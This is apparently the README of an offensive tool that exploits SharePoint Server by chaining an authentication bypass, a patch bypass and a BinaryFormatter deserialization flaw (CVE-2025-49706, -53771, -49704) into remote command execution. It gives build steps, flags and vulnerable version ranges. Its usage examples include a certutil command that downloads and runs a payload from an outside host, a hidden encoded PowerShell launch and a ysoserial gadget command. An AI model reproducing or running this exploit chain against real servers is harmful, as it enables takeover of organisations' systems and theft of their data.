
Do you really think SharePoint is safe?
Self-contained, single-binary SharePoint RCE tool. Generates a TypeConfuseDelegate gadget chain as raw MS-NRBF bytes (no ysoserial.exe), wraps it in a DataSet deserialization payload, and delivers it over HTTP using the authentication bypass — all in one shot.
| Step | CVE | Description |
|---|---|---|
| 1 | CVE-2025-49706 | Auth bypass — Referer: /_layouts/SignOut.aspx skips SharePoint authentication |
| 2 | CVE-2025-53771 | Patch bypass — trailing path segment after ToolPane.aspx evades July 2025 fix |
| 3 | CVE-2025-49704 | Deserialization — ExcelDataSet.CompressedDataTable triggers BinaryFormatter on a crafted DataSet |
| 4 | — | DataSet schema forces LosFormatter.Deserialize() on inner payload via ExpandedWrapper + ObjectDataProvider |
| 5 | — | TypeConfuseDelegate — SortedSet<string> comparer is Process.Start(string, string), executing cmd /c <command> |
The entire binary stream (both the outer DataSet wrapper and the inner TypeConfuseDelegate gadget) is constructed as raw MS-NRBF records — no .NET runtime serialization is used. This matches the format produced by the Metasploit module byte-for-byte.
Requires .NET Framework 4.8 SDK (Visual Studio 2022 or standalone Build Tools):
& "C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" OurSharePoint.sln /p:Configuration=Release
Output: OurSharePoint\bin\Release\OurSharePoint.exe (single file, no dependencies)
OurSharePoint.exe --cmd="certutil -urlcache -split -f http://10.0.0.5/payload.exe C:\Windows\Temp\p.exe & C:\Windows\Temp\p.exe" --target=https://sp.corp.com
OurSharePoint.exe --cmd="whoami > C:\Windows\Temp\pwned.txt" --target=https://sp.corp.com
OurSharePoint.exe --cmd="powershell -nop -w hidden -enc <base64>" --target=https://sp.corp.com
OurSharePoint.exe --target=https://sp.corp.com --check
OurSharePoint.exe --cmd="calc.exe" --out=exploit
OurSharePoint.exe --cmd="whoami" --target=https://sp.corp.com --proxy=http://127.0.0.1:8080
ysoserial.exe -f LosFormatter -g TypeConfuseDelegate -o base64 -c "cmd /c calc.exe" > gadget.b64
OurSharePoint.exe --in=gadget.b64 --target=https://sp.corp.com
| Flag | Description | Default |
|---|---|---|
--cmd=COMMAND | Command to execute (runs as cmd /c COMMAND) | — |
--in=FILE | Pre-built base64 LosFormatter payload file | — |
--target=URL | SharePoint base URL for HTTP delivery | — |
--check | Fingerprint version only, no payload | — |
--out=PREFIX | Output file prefix | payload |
--sp-version=VER | Layouts path version (15 or 16) | 15 |
--proxy=URL | HTTP proxy | — |
--ua=STRING | Custom User-Agent | Firefox 120 |
--referer=URL | Override auth-bypass Referer | auto |
--timeout=SEC | HTTP timeout | 15 |
--a/b/c=NAME | DataSet/element/column names | random |
When --out is used, the tool writes:
| File | Contents |
|---|---|
<prefix>.bin | Raw BinaryFormatter DataSet stream |
<prefix>.b64 | GZip + Base64 encoded (what goes into CompressedDataTable) |
| Edition | Vulnerable Range |
|---|---|
| SharePoint Server Subscription Edition | 16.0.14326.20450 – 16.0.18526.20424 |
| SharePoint Server 2019 | 16.0.10337.12109 – 16.0.10417.20027 |
| SharePoint Enterprise Server 2016 | 16.0.4351.1000 – 16.0.5508.1000 |
| SharePoint Server 2013 | 15.0.4481.1005 – 15.0.5545.1000 |
BinaryWriter. This avoids differences between .NET runtime serialization output and what the target deserializer expects.ObjectStateFormatter header bytes (0xFF 0x01 0x32 + 7-bit length) instead of using LosFormatter.Serialize().